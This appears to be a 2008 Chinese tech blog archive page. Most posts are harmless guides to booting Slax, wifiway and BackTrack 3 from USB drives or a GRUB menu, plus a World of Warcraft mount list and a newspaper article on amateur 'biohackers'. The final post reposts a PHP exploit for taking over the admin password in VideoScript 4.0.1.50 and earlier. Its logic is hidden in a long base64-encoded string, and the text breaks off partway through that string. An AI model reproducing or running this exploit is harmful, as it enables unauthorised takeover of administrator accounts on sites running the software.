live-CD Slax弹出CD盘片

2008年11月20日 没有评论 55 views

如果想在系统启动后弹出Slax的CD盘片(例如想观看DVD或者光盘MP4影片),则需要在引导时的提示符输入“slax copy2ram”并回车

分类: 技术文章 标签: ,

wifiway的U盘安装启动方式

2008年11月20日 没有评论 358 views

我的WIFIWAY安装之路走了很久了,直到今天才算成功。在此感谢cingular的提醒。

BT3U盘安装方式已经有了,但是wifiway的U盘安装方式呵BT3的不一样。

步骤如下:

首先下载wifiway0.8

http://download.wifislax.com/wifiway-0.8.iso

ftp://files.tuto-fr.com:8080/distro/wifiway-0.8.iso

http://www.comprawifi.net/public/wifiway/0.8/wifiway-0.8.iso

md5: 7291c1ffbad23f686ebf9fbf6a001bb6

1.然后将下载后的wifiway-0.8解压,解压后将生成两个文件夹(boot、wifiway)

2.将解压后的两个文件夹(boot、wifiway)拷贝到U盘

3.将wifiway的文件夹的名称为wifislax

4.在http://telefonica.net/web2/wifislax/modulos-extra/ws31usb.zip地址下载文件(ws31usb.zip)

5.解压下载的文件ws31usb.zip后将生成两个文件(initrd.gzvmlinuz)

6.将initrd.gzvmlinuz这两个文件拷贝到U盘中boot文件夹中覆盖原来的两个文件

7.在windows下打开U盘再打开boot文件夹找到bootinst.bat 文件,双击运行。根据提示按任意键安装。再按任意键提示退出

8.至此整个过程OK,将U盘插入USB接口选择U盘启动模式。一路回车OK(不需要输入acpi=off)
 

分类: 技术文章 标签:

硬盘菜单式启动BT和wifiway

2008年11月20日 没有评论 237 views

准备工作
首先下载wifiway1.0和BT3
wifiway下载地址http://download.wifislax.com:8080/wifiway-1.0-beta2.iso
md5: e24ca81486718e546246788ec5834d02

BT3下载地址http://backtrack.mjdupree.com/bt3b141207.iso
md5: 04ed8742fc8facd1ecc8c9f6f567c116

下载后分别解压,wifiway解压后将生成两个文件夹(boot、wifiway),BT3解压后生产两个文件夹(boot、bt3)

(因为有两个boot文件,所以把wifiway解压后的boot文件夹可修改成wifiwayboot,将BT3解压后的boot可修改成bt3boot)

修改wifiway的文件
1.将解压后生成的wifiway的文件夹的名称为wifislax
2.4.在http://telefonica.net/web2/wifislax/modulos-extra/ws31usb.zip地址下载文件(ws31usb.zip)
3.解压下载的文件ws31usb.zip后将生成两个文件(initrd.gz 和vmlinuz)
4.将initrd.gz 和 vmlinuz这两个文件拷贝到解压后boot文件夹中覆盖原来的两个文件

修改bt3
1.把解压后的bt3文件夹的名称改成大写的BT3
2.把中文字体拷贝到BT3的modules目录下

这样就生成了bt3boot,BT3,wifiboot,wifislax这四个文件夹.把这四个文件夹放入硬盘FAT32分区的的根目录下

接下来讲grub的多系统引导程序
可到superconduct兄的文章中
http://www.anywlan.com/bbs/dispbbs.asp?boardid=15&id=8566
下载grub4dos内置菜单编辑器和grldr两个全下载下来(grldr是个隐藏文件,需打开显示所有文件)grub4dos内置菜单编辑器需要用到grldr文件和melu.lst文件

这是我自己编辑的一个melu.lst文件(各位可把如下文件用记事本保存,并且把记事本文件的txt后缀改成lst)
default 0
timeout 10
splashimage (hd0,0)/grub/anywlan.gz
fontfile (hd0,0)/grub/fonts
title 1. Start BT3 on F Disk
kernel (hd0,3)/bt3boot/vmlinuz root=/dev/ram0
initrd (hd0,3)/bt3boot/initrd.gz
title 2. Start Wifiway on F Disk
kernel (hd0,3)/wifiwayboot/vmlinuz root=/dev/ram0
initrd (hd0,3)/wifiwayboot/initrd.gz
title 3. Start Windows
rootnoverify (hd0,0)
makeactive
chainloader +1
title 4. reboot
reboot
title 5. Halt
halt

本主主要讲的就是编辑这个melu.lst文件,并生成grldr文件,最后利用grub启动BT3和WIWIWAY1.0

下面我就针对上面的这个melu.lst文件逐一介绍一下(编辑melu.lst菜单文件,其命令必须全部用小写英文,说明文字除外)

default 0 (默认值,无需修改)
timeout 10 (默认延时单位秒,根据自己需要修改)
splashimage (hd0,0)/grub/anywlan.gz(设置图形背景,这个背景是我自己做的,需要的朋友可以自己做一个或者网上下载.如果你们不需要图形,也可以删除这一行,(hd0,0)/grub/是存放图形文件的绝对路径)
fontfile (hd0,0)/grub/fonts(设置中文字体的支持,这个不能单独执行,需要配合上面的splashimage共同使用,此字体库需要网上下载,如不不用中文的可以删除这一行)
title 1. Start BT3 (这一行是说明文字,可以自己随意写)
kernel (hd0,3)/bt3boot/vmlinuz root=/dev/ram0 (这步单独介绍)
initrd (hd0,3)/bt3boot/initrd.gz (这步单独介绍)
title 2. Start Wifiway on F Disk(这一行是说明文字,可以自己随意写)
kernel (hd0,3)/wifiwayboot/vmlinuz root=/dev/ram0 (这步单独介绍)
initrd (hd0,3)/wifiwayboot/initrd.gz (这步单独介绍)
title 3. Start Windows(这一行是说明文字,可以自己随意写)
rootnoverify (hd0,0)(下面三步是执行命令返回到windows启动菜单)
makeactive
chainloader +1
title 4. reboot(这一行是说明文字,可以自己随意写)
reboot(这个不说了,重启)
title 5. Halt(这一行是说明文字,可以自己随意写)
halt(这个不用解释了)

单独介绍的部分
kernel (hd0,3)/bt3boot/vmlinuz root=/dev/ram0
initrd (hd0,3)/bt3boot/initrd.gz

kernel是grub的命令.后面的(hd0,3)/bt3boot/是vmlinuz文件的绝对路径

使用绝对路径时要注意GRUB对设备的命名方法。系统的第一个硬盘驱动器表示成(hd0),其上的第一个分区表示为(hd0,0),也就是说对于硬盘,采用(hdx,y)的形式来表示,x、y都是从0开始计数的,x表示硬盘号,y表示分区号。由于主分区只能有四个,所以第一硬盘的四个主分区分别用(hd0,0)~(hd0,3)来表示;逻辑分区则从(hd0,4)开始算,即第一逻辑分区用(hd0,4),第二逻辑分区用(hd0,5)来表示,依次类推。一般机子的硬盘都是一个主分区,其余是逻辑分区。因此C盘用(hd0,0),D盘用(hd0,4)来表示。

很多朋友需要修改的就是这个(hd0,3)路径.各位朋友根据自己的实际情况做修改.首先确认你bt3boot,BT3,wifiboot,wifislax这四个文件夹放入了哪个分区的更目录.然后根据上面的grub对设备的命名方法修改此绝对路径即可.

编辑完menu.lst以后用grub4dos内置菜单编辑器把此文件改写到grldr中.
打开grub4dos内置菜单编辑器,选择第二项"改写内置菜单".有两个浏览,第一个浏览选择刚才下载的grldr文件,下

面一个浏览选择你刚才编辑的menu.lst文件然后点确定.这时候就改写了grldr文件.把这个改写过的grldr文件拷贝

 

注:vmlinuz和initrd.gz是BT和wifiway启动的核心文件。两个软件都有,分别位于boot文件夹下。

到C盘根目录下.

编辑boot.ing文件
此文件在C盘根目录下,是隐藏的只读系统文件,需要在系统菜单/工具/文件夹选项/查看/去掉隐藏受保护的操作系

统文件前面的勾/确定
在C盘根目录下可以看到boot.ini文件,去掉只读属性.打开此文件后在最下面加上这样一行

c:\grldr="WIFI Linux" (WIFI Linux这个是说明文字,你可自己随意编辑,可以用中文)

至此全部OK了.

启动PC出现windows启动菜单,下面有一行WIFI Linux.选择后将进入grub菜单.再选择Start BT3将进入BT3.选择

Start WIFIWAY将进入wifiway.

分类: 技术文章 标签: ,

多个Linux系统的U盘

2008年11月20日 没有评论 472 views

我的4G U盘只装一个BT3貌似太浪费了,所以就顺便把Slax,Damn Small Linux,Puppy Linux这些迷你linux系统一起装上~装完后也才1G多点~

步骤一:把要装的系统下载回来,解压缩,并把U盘格式化成FAT32文件系统
title
title
title
步骤二:

把Slax的两个文件夹[boot和slax]复制到U盘,

把BackTrack3的两个文件夹[boot和BT3,boot改名成bootbt3]复制到U盘

把damn small linux的两个文件夹[boot和KNOPPIX,boot改名成bootdsl]复制到U盘

把puppy linux的4个文件[VMLINUZ,INITRD.GZ,PUP_400.SFS,ZDRV_400.SFS]复制到U盘

title
title
title
title
步骤三:(可以不做,我比较喜欢干净,所以我把不用的都删掉)

把bootbt3下的文件(除了vmlinuz和initrd.gz)全部删掉

把bootdsl下的文件(除了linux24和minirt24.gz)全部删掉

title
title
步骤四:

运行/boot/bootinst.bat

修改/boot/syslinux/syslinux.cfg 内容如下

PROMPT 0
TIMEOUT 90
DEFAULT /boot/vesamenu.c32
MENU BACKGROUND /boot/slax.png

MENU WIDTH 36
MENU MARGIN 0
MENU ROWS 10
MENU HELPMSGROW 14
MENU TIMEOUTROW 22
MENU TABMSGROW 24
MENU CMDLINEROW 24
MENU HSHIFT 40
MENU VSHIFT 2

menu color screen 37;40 #00000000 #00000000 none
menu color border 30;44 #00000000 #00000000 none
menu color title 1;36;44 #00000000 #00000000 none
menu color unsel 37;44 #ff60CA00 #00000000 none
menu color hotkey 1;37;44 #ff60CA00 #00000000 none
menu color sel 7;37;40 #ffffffff #ff60CA00 none
menu color hotsel 1;7;37;40 #ff808080 #ff60CA00 none
menu color scrollbar 30;44 #00000000 #00000000 none

menu color tabmsg 31;40 #aaaaaaaa #00000000 none
menu color cmdmark 1;36;40 #ffff0000 #00000000 none
menu color cmdline 37;40 #aaaaaaaa #00000000 none
menu color pwdborder 30;47 #ffff0000 #00000000 std
menu color pwdheader 31;47 #ffff0000 #00000000 std
menu color pwdentry 30;47 #ffff0000 #00000000 std
menu color timeout_msg 37;40 #aaaaaaaa #00000000 none
menu color timeout 1;37;40 #ffaaaaff #00000000 none
menu color help 37;40 #aaaaaa00 #00000000 none
menu color msg07 37;40 #90ffffff #00000000 std

LABEL BT3
MENU LABEL BT3 Text mode Frame Buffer
KERNEL /bootbt3/vmlinuz
APPEND vga=0x317 initrd=/bootbt3/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw

LABEL copy2ram
MENU LABEL BT3 Graphics mode, Copy To RAM
KERNEL /bootbt3/vmlinuz
APPEND vga=0x317 initrd=/bootbt3/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw copy2ram autoexec=xconf;kdm

LABEL startx
MENU LABEL Slax Graphics VESA mode No Save
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=telinit~4

LABEL slax
MENU LABEL Slax Text mode
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw

LABEL cp2ram
MENU LABEL Slax Copy To RAM
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw copy2ram autoexec=xconf;telinit~4

LABEL startxsave
MENU LABEL Slax Graphics VESA mode Save
KERNEL /boot/vmlinuz
APPEND initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=telinit~4 changes=/slax/

LABEL dsl
MENU LABEL Damn Small Linux
KERNEL /bootdsl/linux24
APPEND ramdisk_size=100000 init=/etc/init lang=us apm=power-off vga=791 initrd=/bootdsl/minirt24.gz nomce noapic quiet BOOT_IMAGE=/knoppix

LABEL dsl-txt
MENU LABEL Damn Small Linux Text Mode
KERNEL /bootdsl/linux24
APPEND ramdisk_size=100000 init=/etc/init lang=us apm=power-off vga=normal initrd=/bootdsl/minirt24.gz nomce noapic quiet BOOT_IMAGE=/knoppix

LABEL puppy
MENU LABEL Puppy Linux
KERNEL /VMLINUZ
APPEND initrd=/INITRD.GZ pmedia=cd

LABEL memtest86
MENU LABEL Run Memtest utility
KERNEL /boot/mt86p

title

分类: 技术文章 标签:

U盘安装多个Linux系统的方法

2008年11月20日 没有评论 245 views

我一直使用光盘安装系统,但是光盘介质容易损坏,而且系统一旦升级,又要重新刻过光盘。
上个星期,看到一篇文章,介绍使用U盘安装系统,受到启发,开始制作自己的多功能U盘。

工作环境:Linux及FreeBSD
工具:U盘一个(大于64M)

1、格式化U盘:
因为想在windows下也能使用U盘,所以把U盘格式成FAT32格式

进入Linux,格式化U盘

#mkfs.vfat /dev/sda1

2、在U盘上安装grub:

#grub --no-floppy

grub>root (hd1,0)

grub>setup (hd1)

......

grub>quit

#mkdir /mnt/usb
#mount /dev/sda1 /mnt/usb
#mkdir -p /mnt/usb/boot/{grub,kernel,image}
#cp /boot/grub/stage{1,2} /mnt/usb/boot/grub
#cp /boot/grub/fat_stage1_5 /mnt/usb/boot/grub

3、加入Ubuntu 8.04启动项:

打开链接:http://ubuntu.cn99.com/ubuntu/dists/hardy/main/installer-i386/current/images/netboot/ubuntu-installer/i386/

下载ubuntu 8.04的两个文件:linux和initrd.gz,并分别改名ubuntu804和ubuntu804.gz

#mv linux ubuntu804
#mv initrd.gz ubuntu804.gz

将这两个文件复制到U盘上:

#cp ubuntu804 /mnt/usb/boot/kernel
#cp ubuntu804.gz /mnt/usb/boot/image


编辑menu.lst文件,若没有则创建:

#vi /mnt/usb/boot/grub/menu.lst

文件包含以下内容:

default 0
timeout 300

title Ubuntu-8.04-installer
kernel /boot/kernel/ubuntu804
initrd /boot/image/ubuntu804.gz

加入debian、CentOS、RHEL4的步骤与上面基本相同

4、加入OpenBSD 4.3安装项:

首先复制memdisk到U盘上:

#cp /usr/lib/syslinux/memdisk /mnt/usb/boot/kernel
#gzip -9 /mnt/usb/boot/kernel/memdisk

到OpenBSD的FTP站点下载启动文件floppy43.fs:
ftp://ftp.freebsdchina.org/pub/OpenBSD/4.3/i386/floppy43.fs

#mv floppy43.fs openbsd43.fs
#cp openbsd43.fs /mnt/usb/boot/image

修改menu.lst:

#vi /mnt/usb/boot/grub/menu.lst

文件包含以下内容:

title OpenBSD-4.3-installer
kernel /boot/kernel/memdisk.gz
initrd /boot/image/openbsd43.fs

5、加入NetBSD 4.0安装项:

到NetBSD的FTP站点下载启动文件boot-big.fs:
ftp://ftp.netbsd.org/pub/NetBSD/NetBSD-4.0/i386/installation/floppy/boot-big.fs

#mv boot-big.fs netbsd40.fs
#cp netbsd40.fs /mnt/usb/boot/image

修改menu.lst:

#vi /mnt/usb/boot/grub/menu.lst

文件包含以下内容:

title NetBSD-4.0-installer
kernel /boot/kernel/memdisk.gz
initrd /boot/image/netbsd40.fs

卸载U盘:

#umount /mnt/usb

6、加入FreeBSD 7.0安装项:

加入FreeBSD的安装启动项比较复杂,需要在FreeBSD6.X或FreeBSD7.X下操作

装载U盘:

#mkdir /mnt/usb
#mount -t msdosfs /dev/da0s1 /mnt/usb

到FreeBSD的FTP站点下载启动文件(boot.flp、kern1.flp、kern2.flp、kern3.flp、mfsroot1.flp):

复制启动文件boot.flp中的内容到临时文件夹boot_tmp下:
#mkdir /mnt/cd
#mdconfig -a -t vnode -f boot.flp -u 0
#mount /dev/md0 /mnt/cd
#mkdir boot_tmp
#cp -R /mnt/cd/* boot_tmp/
#umount /mnt/cd
#mdconfig -d -u 0

查看boot_tmp下的kernel.gz.split和mfsroot.gz.split这两个文件,可以知道kernel.gz文件被分割成了四个文件:kernel.gz.boot、kernel.gz.aa、kernel.gz.ab、kernel.gz.ac,而mfsroot.gz被分割成了mfsroot.gz.boot和mfsroot.gz.aa两个文件,下面就是要把这几个分割开的文件合并到一起;

合并kernel.gz文件:
#mdconfig -a -t vnode -f kern1.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/kernel.gz.aa >> boot_tmp/kernel.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mdconfig -a -t vnode -f kern2.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/kernel.gz.ab >> boot_tmp/kernel.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mdconfig -a -t vnode -f kern3.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/kernel.gz.ac >> boot_tmp/kernel.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mv boot_tmp/kernel.gz.boot boot_tmp/kernel.gz
至此kernel.gz合并完毕

合并mfsroot.gz文件:
#mdconfig -a -t vnode -f mfsroot1.flp -u 0
#mount /dev/md0 /mnt/cd
#cat /mnt/cd/mfsroot.gz.aa >> boot_tmp/mfsroot.gz.boot
#umount /mnt/cd
#mdconfig -d -u 0

#mv boot_tmp/mfsroot.gz.boot boot_tmp/mfsroot.gz
至此mfsroot.gz合并完毕

另外还需要做额外一些工作:
#rm -f boot_tmp/{kernel,mfsroot}.gz.split

修改boot_tmp/boot/loader.conf文件,删除含有"Insert floppy"的两行

再把boot_tmp下的内容打包成启动文件:
#dd if=/dev/zero of=freebsd70 bs=1k count=6800
#mdconfig -a -t vnode -f freebsd70 -u 0
#disklabel -Bw /dev/md0
#newfs /dev/md0a
#mkdir /mnt/hd
#mount /dev/md0a /mnt/hd
#cp -R boot_tmp/* /mnt/hd
#umount /mnt/hd
#mdconfig -d -u 0
#gzip -9 freebsd70
#cp freebsd70.gz /mnt/usb/boot/image/

修改menu.lst:

#vi /mnt/usb/boot/grub/menu.lst

包含以下内容:

title FreeBSD-7.0-installer
kernel /boot/kernel/memdisk.gz
initrd /boot/image/freebsd70.gz


卸载U盘

#umount /mnt/usb

分类: 技术文章 标签:

巫妖王之怒:现有全部坐骑获得方法一览

2008年11月19日 没有评论 56 views

巫妖王新增坐骑的外形请点击>>详细

  除了黑色源龙,瘟疫源龙,紫罗兰源龙是310%速度,其他飞行坐骑都是280%速度的。>>详细

坐骑
种类
飞行/陆行
获得
备注
武装棕熊
陆行
购买
达拉然坐骑商人处购买,价格800金
大型战熊
陆行
TCG
TCG刮刮卡获得
暴雪巨熊
陆行
赠品
2008暴雪嘉年华赠品
黑色北极熊
陆行
未知
未知
白色北极熊
陆行
任务
有极小概率从风暴之巅日常奖励的补给袋中抽得
白化幼龙
幼龙
飞行
成就
“50坐骑收集”成就奖励
碧空幼龙
幼龙
飞行
副本
25人轮回之眼,玛里苟斯稀有掉落(未确认)
黑色幼龙
幼龙
飞行
副本
10人黑耀石神殿,Sartharion困难模式(不击杀两个小Boss)掉落
蓝色幼龙
幼龙
飞行
副本
10人轮回之眼,玛里苟斯稀有掉落(未确认)
青铜幼龙
幼龙
飞行
副本
时光之穴:斯坦索姆英雄难度,急速模式下(25分钟内击杀四个Boss)隐藏boss必然掉落
红色幼龙
幼龙
飞行
购买
龙憩神殿崇拜后可购买,价格1600金
晨曦幼龙
幼龙
飞行
副本
25人黑耀石神殿,Sartharion困难模式掉落
武装雪色狮鹫
狮鹫
飞行
购买
达拉然坐骑商人处购买,价格2000金
黑色作战猛犸
猛犸
陆行
购买
在赢取冬拥湖战场胜利后,在战场军需官处购买,价格30个冬拥战场牌子(Stone Keeper's Shard )换取
巨型黑色作战猛犸
猛犸
陆行
未知
获得方法未知,推测为冬拥湖战场获得
旅者的苔原猛犸
猛犸
陆行
购买
达拉然坐骑商人处购买,价格20000金
巨型冰霜猛犸
猛犸
陆行
购买
侯迪尔子嗣崇拜可购买,价格10000金
冰霜猛犸
猛犸
陆行
购买
侯迪尔子嗣崇敬可购买,价格10000金
蓬毛猛犸
猛犸
陆行
购买
达拉然坐骑商人处购买,价格200英雄徽章
黑色源龙
源龙
飞行
成就
完成成就“英雄团队的荣耀(Heroic: Glory of the Raider)”后获得
蓝色源龙
源龙
飞行
副本
英雄难度乌特嘉德巅峰,“石心”斯卡迪(Skadi the Ruthless)小几率掉落
绿色源龙
源龙
飞行
未知
未知
瘟疫源龙
源龙
飞行
成就
完成成就“团队的荣耀(Glory of the Raider)”后获得
红色源龙
源龙
飞行
成就
完成成就“英雄荣耀(Glory of the Hero)”后获得
无限源龙
源龙
飞行
掉落
风暴之巅稀有精英无限源龙小几率掉落,有传言说玛里苟斯的伴侣“薇拉苟萨”也有小几率掉落
紫罗兰源龙
源龙
飞行
成就
完成成就“奇趣之旅(What a Long, Strange Trip It's Been)”后获得
武装蓝色双足飞龙
双足飞龙
分类: 影音娱乐 标签:

《人民日报》:当心 生物黑客要来了

2008年11月19日 没有评论 71 views

20多年前,曾有人预言生物革命将成为21世纪的时代特征。当时还有观点认为,这一革命对社会伦理的冲击尤其值得关注。现在,克隆生物对社会伦理的冲击波犹在,而伴随着生物学的进步和普及,“生物黑客”也要来了。对于生物黑客,目前网络媒体和专业论坛对其别称不少:生物崩客,自己动手(DIY)生物学家,车库生物学家……这些名称除了含有像电脑黑客一样的反叛精神外,还反映出现代生物学一些重要的新特征:即生物科学的神秘性日益被打破,生物科学的普及也日渐广泛。最值得注意的是:生物学及生物工程的成本日益降低, 生物学界的爱因斯坦可能像科幻大片中描述的那样:随时从邻居家的车库里走出来。
title

7月15日,北京举行生物恐怖袭击现场处置与医疗救援应急演练,参加演练人员对“重伤员”进行紧急救治。此次演练模拟恐怖分子在某电影院里使用不明物质实施生物恐怖袭击,市卫生局接警后立即启动处置生物恐怖袭击事件应急预案,参加演练人员完成了事发现场划定和封控、暴露人员疏散、流行病学调查等课目的演练。

谈及黑客,人们很可能想起网络黑客。但多数生物黑客们宣称:他们的行动宗旨不是制造麻烦,而是为了防止出现技术被少数专业人士所掌握而形成的垄断操纵。因此,他们主要是通过网络及其他手段来普及现代生物学知识。生物黑客们在网上教人们如何从菠萝里提取基因,还教人们如何以低廉价格从水、酒精中提取基因,甚至告诉人们如何网购低价的实验仪器,并利用这些仪器进行从简单到复杂的基因工程。


有人预告,生物黑客将会以业余爱好者身份在自家车库造出我们现今还无法知晓的生物新物种或者说是怪物。他们虽然是业余爱好者,但他们中可能有许多都毕业于哈佛之类的名校,甚至还可能是某些知名的科学人士。平时他们可能以智库成员的身份出现在自己的工作单位,业余时间则按自己的理想或幻想搞生物实验。


美国有家网站叫做“开放湿件”(即“开放思想库”)平台,许多基因工程科学家或者爱好者将自己的研究成果公布在网上。据说,任何一个有些基本生物学知识的人,都可以按自己的想法借鉴上面的知识和技能来组装自己设想的生物物种或器官。前者就像是造“生物砖”的人,后者则是用“生物砖”完成生物工程的设计组装人员。甚至有人预测,未来的儿童不是搭普通的积木,而是按自己的幻想设计搭 “生物积木”,做出自己喜欢的任何物种。甚至未来的智力竞赛也可能是以新物种、或者新器官的设计为竞赛内容。有科学家已经在设想生产出一种专门制造“生物砖”的三维打印机来简化基因工程的工艺流程。


对于生物黑客群体的估计,有报道称,目前世界上至少有10万人能制造炭疽病菌。面对数量如此庞大、能力如此之强的生物工程学爱好者,以及生物工程学和基因知识的普及,人们不免会产生许多担忧:谁能保证这么多人中间不出一个恐怖分子?即使没有恐怖分子,谁又能保证没有人将自己的知识传授给恐怖分子?

分类: 技术文章 标签:

VideoScript <= 4.0.1.50 Admin Change Password Exploit

2008年11月19日 没有评论 78 views

<?php
  /* 
  ==============================================================================
              _      _       _          _      _   _ 
             / \    | |     | |        / \    | | | |
            / _ \   | |     | |       / _ \   | |_| |
                 / ___ \  | |___  | |___   / ___ \  |  _  |
             IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                 

  ==============================================================================
              ____   _  _     _   _    ___    _  __
             / ___| | || |   | \ | |  / _ \  | |/ /
            | |  _  | || |_  |  \| | | | | | | ' / 
            | |_| | |__   _| | |\  | | |_| | | . \ 
             \____|    |_|   |_| \_|  \___/  |_|\_\

  ==============================================================================
    VideoScript <= 4.0.1.50 Admin Change Password Exploit
  ==============================================================================

    [»] Script:             [ VideoScript <= 4.0.1.50 ]
    [»] Language:           [ PHP ]
    [»] Website:            [ http://videoscript.co.uk/ ]
    [»] Type:               [ Commercial ]
    [»] DOD:                [ 15.11.2008 ]
    [»] Founder.Coder:      [ G4N0K <mail.ganok[at]gmail.com> ]


  ===[ XPL ]===
                                          */

error_reporting(E_ALL);
   $G4N0K = "JEc0TjBLID0gPDw8RU9HDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
      "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAg".
      "ICAgICBfICAgICAgXyAgICAgICBfICAgICAgICAgIF8gICAgICBfICAgXyANCiAgICAgICAgICAg".
      "ICAgICAgICAgIC8gXCAgICB8IHwgICAgIHwgfCAgICAgICAgLyBcICAgIHwgfCB8IHwNCiAgICAg".
      "ICAgICAgICAgICAgICAgLyBfIFwgICB8IHwgICAgIHwgfCAgICAgICAvIF8gXCAgIHwgfF98IHwN".
      "CiAgICAgICAgICAgICAgICAgICAvIF9fXyBcICB8IHxfX18gIHwgfF9fXyAgIC8gX19fIFwgIHwg".
      "IF8gIHwNCiAgIElOIFRIRSBOQU1FIE9GIC9fLyAgIFxfXCB8X19fX198IHxfX19fX3wgL18vICAg".
      "XF9cIHxffCB8X3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg".
      "ICAgICAgICAgICAgICAgICANCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
      "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogICAgICAgICAgICAg".
      "ICAgICAgICAgX19fXyAgIF8gIF8gICAgIF8gICBfICAgIF9fXyAgICBfICBfXw0KICAgICAgICAg".
      "ICAgICAgICAgICAgLyBfX198IHwgfHwgfCAgIHwgXCB8IHwgIC8gXyBcICB8IHwvIC8NCiAgICAg".
      "ICAgICAgICAgICAgICAgfCB8ICBfICB8IHx8IHxfICB8ICBcfCB8IHwgfCB8IHwgfCAnIC8gDQog".
      "ICAgICAgICAgICAgICAgICAgIHwgfF98IHwgfF9fICAgX3wgfCB8XCAgfCB8IHxffCB8IHwgLiBc".
      "IA0KICAgICAgICAgZVhwbG8hdCBCeSAgXF9fX198ICAgIHxffCAgIHxffCBcX3wgIFxfX18vICB8".
      "X3xcX1wNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
      "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoJVmlkZW9TY3JpcHQgPD0gNC4wLjEuNTAg".
      "QWRtaW4gQ2hhbmdlIFBhc3N3b3JkIEV4cGxvaXQNCj09PT09PT09PT09PT09PT09PT09PT09PT09".
      "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpF".
      "T0c7DQplY2hvICI8cHJlPiIuJEc0TjBLLiI8L3ByZT4iOw0KJEZPUk0gPSAiPEZPUk0gYWN0aW9u".
      "PVwiIi4kX1NFUlZFUlsiUEhQX1NFTEYiXS4iXCIgbWV0aG9kPVwiUE9TVFwiPiI7JEZPUk0uPSA8".
      "PDxGRkYNCiAgICA8UCBzdHlsZT0id2lkdGg6IDMwMHB4O2NsZWFyOiBsZWZ0O21hcmdpbjogMDtw".
      "YWRkaW5nOiA1cHggMCA4cHggMDtwYWRkaW5nLWxlZnQ6IDE1NXB4O2JvcmRlci10b3A6IDFweCBk".
      "YXNoZWQgZ3JheTsiPg0KICAgIDxMQUJFTCBzdHlsZT0iZm9udC13ZWlnaHQ6IGJvbGQ7ZmxvYXQ6".
      "IGxlZnQ7bWFyZ2luLWxlZnQ6IC0xNTVweDt3aWR0aDoxNTBweDsiIGZvcj0iTVNER05LIj4gV2Vi".
      "c2l0ZSA6Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
      "c3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHls".
      "ZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFtZT0iTVNER05LIiBpZD0iTVNER05LIj48".
      "YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21h".
      "cmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9IlBBVEgiPlBhdGg6ICggL3Njcmlw".
      "dC8gKTwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIg".
      "dHlwZT0idGV4dCIgbmFtZT0iUEFUSCIgaWQ9IlBBVEgiIHZhbHVlPSIvIj48QlI+DQogICAgPFA
g".
      "c3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjogbGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAg".
      "OHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDtib3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4N".
      "Cgk8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0".
      "OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9Im5wdyI+IE5ldyBQYXNzd29yZCA6IDwvTEFCRUw+".
      "DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIg".
      "bmFtZT0ibnB3IiBpZD0ibnB3Ij48QlI+DQoJPFAgc3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjog".
      "bGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAgOHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDti".
      "b3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4NCiAgICA8SU5QVVQgdHlwZT0ic3VibWl0IiBu".
      "YW1lPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgaXQhIj4gPElOUFVUIHR5cGU9InJlc2V0Ij4NCiAg".
      "ICA8L1A+DQogPC9GT1JNPg0KRkZGOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pICYmIGlz".
      "c2V0KCRfUE9TVFsiTVNER05LIl0pICYmICFlbXB0eSgkX1BPU1RbIk1TREdOSyJdKSAmJiBpc3Nl".
      "dCgkX1BPU1RbJ25wdyddKSAmJiAhZW1wdHkoJF9QT1NUWyducHcnXSkgJiYgaXNzZXQoJF9QT1NU".
      "WyJQQVRIIl0pICYmICFlbXB0eSgkX1BPU1RbIlBBVEgiXSkpIHskbmV3X3B3ZCA9ICRfUE9TVFsn".
